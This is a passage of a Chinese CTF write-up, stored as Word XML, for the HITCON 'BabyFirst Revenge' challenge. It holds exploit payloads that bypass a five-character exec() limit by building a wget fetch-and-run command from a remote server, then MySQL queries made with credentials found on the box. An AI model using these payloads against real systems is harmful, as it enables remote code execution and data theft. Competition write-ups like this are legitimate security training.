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D117B" w14:textId="77777777" w:rsidR="00DB0ED3" w:rsidRPr="00DB0ED3" w:rsidRDefault="00DB0ED3" w:rsidP="00DB0ED3">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF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3"/>
          <w:szCs w:val="33"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DB0ED3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="555555"/>
          <w:kern w:val="36"/>
          <w:sz w:val="33"/>
          <w:szCs w:val="33"/>
        </w:rPr>
        <w:t>BabyFirst</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DB0ED3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="555555"/>
          <w:kern w:val="36"/>
          <w:sz w:val="33"/>
          <w:szCs w:val="33"/>
        </w:rPr>
        <w:t xml:space="preserve"> Revenge</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="8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8010"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DB0ED3" w:rsidRPr="00DB0ED3" w14:paraId="399C851B" w14:textId="77777777" w:rsidTr="00DB0ED3">
        <w:trPr>
          <w:trHeight w:val="21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476CD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738E4526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  <w:p w14:paraId="33FFC93A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78AD0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Do you remember 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BabyFirst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from HITCON CTF 2015?</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="45F5381C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This is the harder version!</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6B766F66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http://52.199.204.34/</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="44AB29C3" w14:textId="77777777" w:rsidR="00DB0ED3" w:rsidRPr="00DB0ED3" w:rsidRDefault="00DB0ED3" w:rsidP="00DB0ED3">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF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3"/>
          <w:szCs w:val="33"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB0ED3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="555555"/>
          <w:kern w:val="36"/>
          <w:sz w:val="33"/>
          <w:szCs w:val="33"/>
        </w:rPr>
        <w:t>Solution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="756DE638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点开后，发现给了源码：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="82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  <w:gridCol w:w="8001"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DB0ED3" w:rsidRPr="00DB0ED3" w14:paraId="723CF5F3" w14:textId="77777777" w:rsidTr="00DB0ED3">
        <w:trPr>
          <w:trHeight w:val="3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5DE05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0BC31A0C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  <w:p w14:paraId="56CAE2A0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3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4064EAAB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4</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A8B7417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5</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="52F18B9E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6</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="17861095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7</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0D36D1FD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8</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0B2290AF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9</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="48153EC6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60A6B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&lt;?php</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="529A9891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  $sandbox = </w:t>
            </w:r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'/www/sandbox/</w:t>
            </w:r>
            <w:proofErr w:type="gramStart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'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.</w:t>
            </w:r>
            <w:proofErr w:type="gram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md5(</w:t>
            </w:r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"orange</w:t>
            </w:r>
            <w:proofErr w:type="gramStart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.</w:t>
            </w:r>
            <w:proofErr w:type="gram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$_SERVER[</w:t>
            </w:r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'REMOTE_ADDR'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]);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0FDBC985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  @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mkdir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($sandbox);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7DCEBACB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  @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chdir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($sandbox);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7EE108E2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  </w:t>
            </w:r>
            <w:r w:rsidRPr="00DB0ED3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if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DB0ED3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isset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($_GET[</w:t>
            </w:r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'</w:t>
            </w:r>
            <w:proofErr w:type="spellStart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cmd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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'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]) &amp;&amp; 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strlen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($_GET[</w:t>
            </w:r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'</w:t>
            </w:r>
            <w:proofErr w:type="spellStart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cmd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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'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]) &lt;= </w:t>
            </w:r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5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 {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1A1ED225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  <w:t xml:space="preserve">   @exec($_GET[</w:t>
            </w:r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'</w:t>
            </w:r>
            <w:proofErr w:type="spellStart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cmd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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'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]);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2B709BA7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  } </w:t>
            </w:r>
            <w:r w:rsidRPr="00DB0ED3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else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DB0ED3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if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DB0ED3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isset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($_GET[</w:t>
            </w:r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'reset'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])) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1A1010B7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  <w:t xml:space="preserve">   @</w:t>
            </w:r>
            <w:proofErr w:type="gram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exec(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd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'/bin/rm -rf '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. $sandbox);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="755DF50C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  }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="308ED2E2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highlight_file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DB0ED3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__FILE__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);</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="27B460EB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简要的分析一下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DF6D1BD" w14:textId="77777777" w:rsidR="00DB0ED3" w:rsidRPr="00DB0ED3" w:rsidRDefault="00DB0ED3" w:rsidP="00DB0E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对每个REMOTE_ADDR有对应的sandbox</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10D92C9C" w14:textId="77777777" w:rsidR="00DB0ED3" w:rsidRPr="00DB0ED3" w:rsidRDefault="00DB0ED3" w:rsidP="00DB0E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能执行长度&lt;=5的命令</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76911431" w14:textId="77777777" w:rsidR="00DB0ED3" w:rsidRPr="00DB0ED3" w:rsidRDefault="00DB0ED3" w:rsidP="00DB0E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提供了reset功能。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C08C7E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之前在总结时，有遇到过，见</w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00DB0ED3">
          <w:rPr>
            <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
            <w:color w:val="555555"/>
            <w:kern w:val="0"/>
            <w:szCs w:val="21"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>chybeta:wafbypass</w:t>
        </w:r>
      </w:hyperlink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proofErr w:type="spell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github</w:t>
      </w:r>
      <w:proofErr w:type="spell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地址为：</w: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begin"/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instrText xml:space="preserve"> HYPERLINK "https://github.com/CHYbeta/WAF-Bypass" \t "_blank" </w:instrTex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separate"/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  <w:u w:val="single"/>
        </w:rPr>
        <w:t>https://github.com/CHYbeta/WAF-Bypass</w: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end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="13DA9ECF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原本的长度为8，而这里为5，条件苛刻了许多。在原本的场景中，我们可以通过构造文件名，之后利用ls命令及其参数将所需的shell命令写入到一个新文件中，并</w:t>
      </w:r>
      <w:proofErr w:type="spell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sh</w:t>
      </w:r>
      <w:proofErr w:type="spell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执行该新文件从而达到任意命令执行。这里同样可以借鉴其思路。关键点有两个：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="450B274B" w14:textId="77777777" w:rsidR="00DB0ED3" w:rsidRPr="00DB0ED3" w:rsidRDefault="00DB0ED3" w:rsidP="00DB0E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长度限制</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57EF35A5" w14:textId="77777777" w:rsidR="00DB0ED3" w:rsidRPr="00DB0ED3" w:rsidRDefault="00DB0ED3" w:rsidP="00DB0E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写入的顺序</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EE9ED23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这里先补充一些基本的知识。在</w:t>
      </w:r>
      <w:proofErr w:type="spell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linux</w:t>
      </w:r>
      <w:proofErr w:type="spell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中，倘若命令过长，</w:t>
      </w:r>
      <w:proofErr w:type="gram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可以用续行</w:t>
      </w:r>
      <w:proofErr w:type="gram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符（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\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）来将一行命令变为多行来写。具体例子如下：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="8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7990"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DB0ED3" w:rsidRPr="00DB0ED3" w14:paraId="2E000C6D" w14:textId="77777777" w:rsidTr="00DB0ED3">
        <w:trPr>
          <w:trHeight w:val="28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B044C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5620B45F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  <w:p w14:paraId="3FB47568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3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0908E8E8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4</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="35DBC2C1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5</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4ACB41FA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EE1D1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ubuntu@VM-207-93-</w:t>
            </w:r>
            <w:proofErr w:type="gram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ubuntu:~</w:t>
            </w:r>
            <w:proofErr w:type="gram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$ cat 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chybeta</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="3A1A1280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echo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\</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="154490D8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  <w:proofErr w:type="spellStart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chy</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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\</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="027567DE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beta"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6D1E685E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ubuntu@VM-207-93-</w:t>
            </w:r>
            <w:proofErr w:type="gram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ubuntu:~</w:t>
            </w:r>
            <w:proofErr w:type="gram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$ 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sh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chybeta</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="4296CB3F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chybeta</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="52E97196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在文件</w:t>
      </w:r>
      <w:proofErr w:type="spell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chybeta</w:t>
      </w:r>
      <w:proofErr w:type="spell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中，通过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\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将命令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echo "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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chybeta</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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"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分成了三个部分。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60B765FA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倘若有一行出错呢？见下：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="8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8091"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DB0ED3" w:rsidRPr="00DB0ED3" w14:paraId="44CC673E" w14:textId="77777777" w:rsidTr="00DB0ED3">
        <w:trPr>
          <w:trHeight w:val="27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00388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25245ED6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  <w:p w14:paraId="7F56F6E7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3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="464B00D7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4</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="466C1AF0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5</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3C523311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6</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="387DF0C3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7</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="528A3DA8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C478D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ubuntu@VM-207-93-</w:t>
            </w:r>
            <w:proofErr w:type="gram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ubuntu:~</w:t>
            </w:r>
            <w:proofErr w:type="gram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$ cat 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chybeta</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="0101A6D2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atebyhc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="37697B6A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echo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\</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="64B06307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  <w:proofErr w:type="spellStart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chy</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00DB0ED3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\</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5DD400D2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beta"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="29306D1B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ubuntu@VM-207-93-</w:t>
            </w:r>
            <w:proofErr w:type="gram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ubuntu:~</w:t>
            </w:r>
            <w:proofErr w:type="gram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$ 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sh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chybeta</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="41D65F1A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chybeta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: 1: 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chybeta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: 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atebyhc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: not found</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="580B4E6C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chybeta</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="70A17F7A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在最前我加了一句</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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atebyhc</w:t>
      </w:r>
      <w:proofErr w:type="spell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，显然这不是命令，但这并不妨碍之后语句的执行，仍然能在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\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的作用下打印出</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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chybeta</w:t>
      </w:r>
      <w:proofErr w:type="spell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</w:p>
    <w:p w14:paraId="7EA44FDF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接下来考虑如何构造文件。由于长度的限制，我们不能通过直接的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ls -t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来通过时间来进行文件名排序并构造。但我们可以曲线救国，先想办法把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ls -t&gt;q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写入到某个文件中，假设为文件a，然后</w:t>
      </w:r>
      <w:proofErr w:type="spell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sh</w:t>
      </w:r>
      <w:proofErr w:type="spell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执行文件a，这样命令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ls -t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的结果就能输出到文件q中。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0099153A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我最后形成的payload1如下：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="18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520"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DB0ED3" w:rsidRPr="00DB0ED3" w14:paraId="574270C4" w14:textId="77777777" w:rsidTr="00DB0ED3">
        <w:trPr>
          <w:trHeight w:val="25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00540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46661E0D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  <w:p w14:paraId="569BA7BC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3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2C7EB2B6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4</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="139ABAAD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5</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="31F8280F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59D8B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&gt;-t\</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7619AC05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&gt;\&gt;q</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="51E92371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&gt;l\</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="780187FB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&gt;s\ \</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6DCA9188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ls&gt;a</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0F3DF73C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ls&gt;&gt;a</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2AED0358" w14:textId="6D5FB62A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这里详细解释。在默认情况下，命令ls，根据名称排序，空格等最前，数字其次，字母最后。当我们执行了前四条语句后，这时文件夹中情况如下(这是我本地环境)：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DB0ED3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 wp14:anchorId="3F3FF64A" wp14:editId="1FDEA8C2">
            <wp:extent cx="5334000" cy="354399"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="7" name="图片 7" descr="https://github.com/CHYbeta/chybeta.github.io/blob/master/images/pic/20171104/2.png?raw=tru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CHYbeta/chybeta.github.io/blob/master/images/pic/20171104/2.png?raw=tru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03" cy="36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0F46" w14:textId="6D3AF654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接着执行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ls&gt;a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后，a中文件内容：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DB0ED3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 wp14:anchorId="13D856E5" wp14:editId="225232D0">
            <wp:extent cx="5457825" cy="1254813"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="6" name="图片 6" descr="https://github.com/CHYbeta/chybeta.github.io/blob/master/images/pic/20171104/3.png?raw=tru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CHYbeta/chybeta.github.io/blob/master/images/pic/20171104/3.png?raw=tru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06" cy="127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D522" w14:textId="6C5340F6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紧接着执行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ls&gt;&gt;a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，这个命令会将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ls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的结果追加到文件a中：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DB0ED3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 wp14:anchorId="6D8A412B" wp14:editId="0D7A8100">
            <wp:extent cx="5419939" cy="1913255"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="5" name="图片 5" descr="https://github.com/CHYbeta/chybeta.github.io/blob/master/images/pic/20171104/4.png?raw=tru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HYbeta/chybeta.github.io/blob/master/images/pic/20171104/4.png?raw=tru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76" cy="19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57FC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其文本内容为：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330"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DB0ED3" w:rsidRPr="00DB0ED3" w14:paraId="4E396D90" w14:textId="77777777" w:rsidTr="00DB0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94832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0A83845A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  <w:p w14:paraId="72793088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3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2E47C852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4</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="12DCAF75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5</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3743E1CA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6</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4239C465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7</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3D303181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8</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7CE80165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9</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6B8A703B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0810B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-t\</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="63635557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&gt;q</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="74CDDC58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</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="188B11D5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l\</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2A37E794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 \</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3DBBF261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-t\</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6E4E565E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&gt;q</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4E5439E7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</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="103E202C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l\</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3A64F5E0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 \</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0C2D0954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由前面所述，错误的命令不会影响后面正确语句的正确执行，所以第一行到第三行是错误的命令可忽略，并且第三行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a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后没有续行符，这不会影响到下一行。从第四行到第七行，由于续行符（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\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），可以构成如下的命令：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="1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788"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DB0ED3" w:rsidRPr="00DB0ED3" w14:paraId="472D2481" w14:textId="77777777" w:rsidTr="00DB0ED3">
        <w:trPr>
          <w:trHeight w:val="160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B9117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3A89F453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  <w:p w14:paraId="596EED3E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3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0F903C3E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3CC66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l\</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2EA52F89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 \</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="121D6361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-t\</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0C7A3418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&gt;q</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="29DE5403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也即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ls -t&gt;q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，能够根据文件的时间来进行排序并将结果写入到文件q中。剩余几行，对结果无影响可忽略。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5149C730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接下来延续以前的套路，想办法</w:t>
      </w:r>
      <w:proofErr w:type="spell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wget</w:t>
      </w:r>
      <w:proofErr w:type="spell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远程的某个文件，这样文件中能藏有足够长的payload。为方便起见-，可以将远程服务器的</w:t>
      </w:r>
      <w:proofErr w:type="spell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转换为十进制，这样不用考虑小数点带来的影响。假设我们的</w:t>
      </w:r>
      <w:proofErr w:type="spell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转换成十进制后为：2077173*48（</w:t>
      </w:r>
      <w:proofErr w:type="spell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hh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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这里我隐去一位数字）。</w:t>
      </w:r>
      <w:proofErr w:type="gram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则命令</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd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wget</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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 xml:space="preserve"> 2077173*48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，会从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2077173*48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处下载并默认保存为index.html。考虑到长度的限制，我们需要将上述命令分段成长度小于等于5，并用续行符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\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隔开。考虑到，前面是使用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ls -t&gt;q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，而参数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-t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，会让新生成的文件排在前面，越早生成的文件排在后面。所以构造这一部分的payload如下:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="1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1035"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DB0ED3" w:rsidRPr="00DB0ED3" w14:paraId="6E566FFC" w14:textId="77777777" w:rsidTr="00DB0ED3">
        <w:trPr>
          <w:trHeight w:val="2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B5CF3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2FD987F5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  <w:p w14:paraId="474185E4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3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="37BA4509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4</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7FF72F80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5</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="48E63B68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1F300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&gt;*48</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6B542841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&gt;173\</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="16993CFA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&gt;077\</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0FC503F0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&gt;\ 2\</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1434BBBF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&gt;et\</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="461352A5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&gt;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wg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\</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7D1F8DCB" w14:textId="77777777" w:rsid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此时文件目录为：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DB0ED3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 wp14:anchorId="6BF2EE61" wp14:editId="37D6077E">
            <wp:extent cx="5881095" cy="730158"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="4" name="图片 4" descr="https://github.com/CHYbeta/chybeta.github.io/blob/master/images/pic/20171104/5.png?raw=tru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CHYbeta/chybeta.github.io/blob/master/images/pic/20171104/5.png?raw=tru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249" cy="75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5A69" w14:textId="03CD7C20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接着执行命令</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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 xml:space="preserve"> a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，注意文件a是我们第一阶段时生成的，其中包含命令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ls -t&gt;q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。运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行完后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查看新生成的文件q：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DB0ED3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 wp14:anchorId="61AFDE78" wp14:editId="2D96E88D">
            <wp:extent cx="5550450" cy="2043602"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="3" name="图片 3" descr="https://github.com/CHYbeta/chybeta.github.io/blob/master/images/pic/20171104/6.png?raw=tru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CHYbeta/chybeta.github.io/blob/master/images/pic/20171104/6.png?raw=tru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42" cy="207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51A6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如前所述，这里构成了一个新的命令</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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wget</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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 xml:space="preserve"> 2077173*48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。注意在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*48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的下一行是文件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a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的名字，由于它后面没有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\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，并且字母顺序在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s\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之前，刚好起了一个分割的作用。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A852F8A" w14:textId="11AC101D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接下来执行命令</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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 xml:space="preserve"> q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，这里为演示方便在本地shell中操作，这</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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跟访问</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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?</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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=sh%20a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的效果是一样的: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DB0ED3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 wp14:anchorId="32F69CB4" wp14:editId="07D2B48B">
            <wp:extent cx="5513592" cy="2111366"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="2" name="图片 2" descr="https://github.com/CHYbeta/chybeta.github.io/blob/master/images/pic/20171104/7.png?raw=tru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CHYbeta/chybeta.github.io/blob/master/images/pic/20171104/7.png?raw=tru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270" cy="213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79A1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可以发现成功的下载了远程的文件并保存到index.html中，而index.html是存放在我们自己的服务器上的，只要执行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sh%20i*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，注意这里用来通配符</w:t>
      </w:r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*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，就能够执行</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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>sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DB0ED3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="CCCCCC"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="2D2D2D"/>
        </w:rPr>
        <w:t xml:space="preserve"> index.html</w:t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，从而执行其中的命令。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12AFEDAF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接下来，需要不断的进行探索flag的所在地。可以按照下述命令来实现命令的执行：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379"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DB0ED3" w:rsidRPr="00DB0ED3" w14:paraId="4C650D3D" w14:textId="77777777" w:rsidTr="00DB0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DFE09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1F47603C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  <w:p w14:paraId="1043A3C9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F132A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?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cmd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=rm%20i*   // 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删除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index.html</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="27BEEE21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?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cmd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=sh%20a    // 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执行文件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q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，即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wget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新的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index.html</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="62C2207B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?</w:t>
            </w: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cmd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=sh%20i*   // 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执行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index.html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中的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shell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命令</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5BB9AEFB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在经过一番摸索后，发现在home目录的某个用户的主目录下有README.txt，其内容为：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189"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DB0ED3" w:rsidRPr="00DB0ED3" w14:paraId="267D3CCC" w14:textId="77777777" w:rsidTr="00DB0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ABA82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6851F992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0490E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Flag is in the MySQL database</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="565F70F5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fl4444g / SugZXUtgeJ52_Bvr</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2D923720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接下去通过替换index.html的内容。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D59985F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index.html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708"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DB0ED3" w:rsidRPr="00DB0ED3" w14:paraId="202D8007" w14:textId="77777777" w:rsidTr="00DB0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754DE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FB91D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mysql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-ufl4444g -pSugZXUtgeJ52_Bvr -e "show databases;" &gt; kk5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0C955501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访问：</w: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begin"/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instrText xml:space="preserve"> HYPERLINK "http://52.199.204.34/sandbox/%E5%AF%B9%E5%BA%94md5/kk5%EF%BC%8C" \t "_blank" </w:instrTex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separate"/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  <w:u w:val="single"/>
        </w:rPr>
        <w:t>http://52.199.204.34/sandbox/对应md5/kk5，</w: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end"/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 得到：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980"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DB0ED3" w:rsidRPr="00DB0ED3" w14:paraId="59951B49" w14:textId="77777777" w:rsidTr="00DB0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AAD47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6106532F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  <w:p w14:paraId="4AB21C79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B251A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Database</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="16CB1371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information_schema</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="07B583FC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fl4gdb</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="484496F6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index.html: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DB0ED3" w:rsidRPr="00DB0ED3" w14:paraId="249E13E9" w14:textId="77777777" w:rsidTr="00DB0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0343C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0A59C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mysql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-ufl4444g -pSugZXUtgeJ52_Bvr -e "SELECT GROUP_</w:t>
            </w:r>
            <w:proofErr w:type="gram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CONCAT(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gram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table_name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 FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA=0x666c34676462" &gt; kk7</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5F6E9AFF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访问：</w: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begin"/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instrText xml:space="preserve"> HYPERLINK "http://52.199.204.34/sandbox/%E5%AF%B9%E5%BA%94md5/kk7%EF%BC%8C" \t "_blank" </w:instrTex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separate"/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  <w:u w:val="single"/>
        </w:rPr>
        <w:t>http://52.199.204.34/sandbox/对应md5/kk7，</w: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end"/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 得到：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
